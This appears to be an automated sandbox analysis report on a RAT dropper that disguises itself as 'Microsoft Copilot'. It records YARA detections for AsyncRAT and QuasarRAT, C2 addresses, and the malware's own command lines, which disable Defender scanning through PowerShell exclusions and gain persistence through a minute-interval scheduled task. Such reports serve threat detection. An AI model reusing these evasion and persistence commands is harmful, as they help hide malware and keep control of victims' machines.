                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdb source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: cil.Pdb.j source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\projects\resourcelib\Source\ResourceLib\obj\Release\net45\Vestris.ResourceLib.pdb source: 7za.exe, 00000004.00000003.1276298878.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Mech RAT/Mono.Cecil.Pdb.dll0] source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cil.Pdb. source: 7za.exe, 00000004.00000002.1276813409.0000000002265000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\_work\1\s\src\Adapter\PlatformServices.Desktop.Legacy\obj\Release\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.pdbl source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr
                    Source: Binary string: BouncyCastle.Crypto.pdb source: BouncyCastle.Crypto.dll.4.dr
                    Source: Binary string: .pdb;Pdb file found for path '{0}' source: Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dll.4.dr

Networking

                    Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49973 -> 147.185.221.21:47900
                    Source: Malware configuration extractor | URLs: content-portion.gl.at.ply.gg
                    Source: Yara match | File source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dll, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED
                    Source: global traffic | TCP traffic: 192.168.2.7:49971 -> 147.185.221.21:47900
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 208.95.112.1
                    Source: Joe Sandbox View | IP Address: 147.185.221.21
                    Source: Joe Sandbox View | ASN Name: TUT-ASUS
                    Source: Joe Sandbox View | ASN Name: SALSGIVERUS
                    Source: unknown | DNS query: name: ip-api.com
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                    Source: global traffic | DNS traffic detected: DNS query: content-portion.gl.at.ply.gg
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: powershell.exe, 00000015.00000002.1843224693.00000205D189C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000013.00000002.1629544454.00000204C320A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mi
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Copilot.exe, 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, Microsoft Copilot.exe.1.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0C
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0H
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0I
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://ocsp.digicert.com0O
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp, Open.Nat.dll.4.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: Open.Nat.dll.4.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: Copilot.exe, 00000001.00000002.2504673520.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000000C.00000002.1333585474.0000022680409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188BA0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAFAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://www.digicert.com/CPS0
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: powershell.exe, 00000010.00000002.1461828423.00000218A3D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1463069808.00000218A3F15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1850332223.00000205D1B7D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1846070427.00000205D1980000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 0000000C.00000002.1333585474.00000226801E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1390032359.000002188B7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1507799351.00000204AAD81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1681415702.00000205B94E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: client.bin.4.dr | String found in binary or memory: https://api.ipify.org/
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000015.00000002.1681415702.00000205B9709000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: Open.Nat.dll.4.dr | String found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: https://github.com/novotnyllc/bc-csharp
                    Source: powershell.exe, 00000013.00000002.1637714732.00000204C340C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
                    Source: client.bin.4.dr | String found in binary or memory: https://ipwho.is/
                    Source: powershell.exe, 0000000C.00000002.1351632078.0000022690255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1447953532.000002189B856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1613594243.00000204BADF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1816529970.00000205C9551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: client.bin.4.dr | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: client.bin.4.dr | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: client.bin.4.dr | String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                    Source: BouncyCastle.Crypto.dll.4.dr | String found in binary or memory: https://www.digicert.com/CPS0

                    E-Banking Fraud

                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED

                    Operating System Destruction

                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process information set: 01 00 00 00

                    System Summary

                    Source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: Detects Quasar infostealer Author: ditekshen
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB36E42
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB32361
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB316E9
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB36096
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Code function: 1_2_00007FFAACB320C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFAACB2264D
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 21_2_00007FFAACB20FDD
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 28_2_00007FFAACB50E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 28_2_00007FFAACB516E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 28_2_00007FFAACB520C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 29_2_00007FFAACB20E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 29_2_00007FFAACB216E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 29_2_00007FFAACB220C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 30_2_00007FFAACB20E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 30_2_00007FFAACB216E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 30_2_00007FFAACB220C1
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 31_2_00007FFAACB40E5E
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 31_2_00007FFAACB416E9
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Code function: 31_2_00007FFAACB420C1
                    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dll E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
                    Source: PixpFUv4G7.exe, 00000000.00000002.1257409990.0000000000D09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunarchiver.exe8 vs PixpFUv4G7.exe
                    Source: PixpFUv4G7.exe, 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCopilot.exe4 vs PixpFUv4G7.exe
                    Source: PixpFUv4G7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: 1.0.Copilot.exe.960000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000002.1258939733.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000001.00000000.1250594519.0000000000962000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, type: DROPPED | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exe, type: DROPPED | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                    Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, type: DROPPED | Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                    Source: Quasar.resources.dll.4.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Copilot.exe.0.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Copilot.exe.0.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: Copilot.exe.0.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: Quasar.Common.dll.4.dr, PayloadReader.cs | Suspicious method names: .PayloadReader.ReadInteger
                    Source: Quasar.Common.dll.4.dr, PayloadReader.cs | Suspicious method names: .PayloadReader.ReadBytes
                    Source: Quasar.Common.dll.4.dr, PayloadReader.cs | Suspicious method names: .PayloadReader.ReadMessage
                    Source: Quasar.Common.dll.4.dr, PayloadReader.cs | Suspicious method names: .PayloadReader.Dispose
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.cs | Suspicious method names: .PayloadWriter.WriteInteger
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.cs | Suspicious method names: .PayloadWriter.WriteBytes
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.cs | Suspicious method names: .PayloadWriter.WriteMessage
                    Source: Quasar.Common.dll.4.dr, PayloadWriter.cs | Suspicious method names: .PayloadWriter.Dispose
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@27/74@2/2
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnk
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1792:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Mutant created: \Sessions\1\BaseNamedObjects\CuWTrNEBgjX4AbNx
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | File created: C:\Users\user~1\AppData\Local\Temp\Copilot.exe
                    Source: PixpFUv4G7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: PixpFUv4G7.exe | ReversingLabs: Detection: 71%
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit graph_0-52
                    Source: unknown | Process created: C:\Users\user\Desktop\PixpFUv4G7.exe "C:\Users\user\Desktop\PixpFUv4G7.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Process created: C:\Users\user\AppData\Local\Temp\Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Copilot.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Process created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: C:\Windows\SysWOW64\unarchiver.exe | Process created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd" "C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip"
                    Source: C:\Windows\SysWOW64\7za.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Copilot.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exe | Section loaded: slc.dll
